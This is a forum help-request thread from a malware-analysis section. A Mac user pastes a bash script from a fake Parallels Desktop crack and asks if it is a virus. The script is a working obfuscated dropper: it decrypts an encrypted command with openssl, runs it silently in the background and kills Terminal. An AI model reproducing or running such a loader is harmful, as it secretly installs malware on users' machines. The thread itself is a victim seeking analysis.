好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
#!/bin/bash
appDir=$(cd $(dirname "$0"); pwd -P)
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
archive="$(echo $binFile | rev)"
commandArgs='U2FsdGVkX19l+G/Pwapjs5bwSnbv0svQiZecgA0SHwmQ9biunPI1H5LFkdy0HlBbQ4djDAlJmkU1l4rVyTig8HeukjBNcH9U/EdzrXoF/kIvQK3SAyxT+xoF1R3BTwwNPbz8x9XjUXBaoTf/q3sTJqMRw6HFXayMB6RGifZNqjY3CreDT1NbNzlHTa7CHh/9xMk4tAYYruOSaCp/087gOMduW4ixyv3UDZn8VECNXBmA3Q6QkZZBq45JwlXK7kpLIG8b8uYLbKKo/7dub3ZhrnX69L6SFSfViJaheCNiawF0XncO93d/brUgZosug2A6'
decryptedCommand="$(echo -e "$commandArgs" | openssl enc -aes-256-cbc -d -A -base64 -k "$archive")"
commandArgs="$(eval echo -e "$decryptedCommand")"
nohup /bin/bash -c "$commandArgs" >/dev/null 2>&1 &
killall Terminal
上面是文件里面的代码,我在下载某个破解文件的时候出现的,不知道什么意思,也不知道是不是病毒。我的电脑是mac book pro,在安装parallel desktop软件的时候想要下载一个破解补丁,下载后发现文件就是上面的文件,点击下就运行了,然后啥都没了。
|
|
发帖前要善用【论坛搜索】功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。 |
|
|
|
|
|
|
发表于 2019-11-20 01:25
|
发表于 2019-11-22 13:51
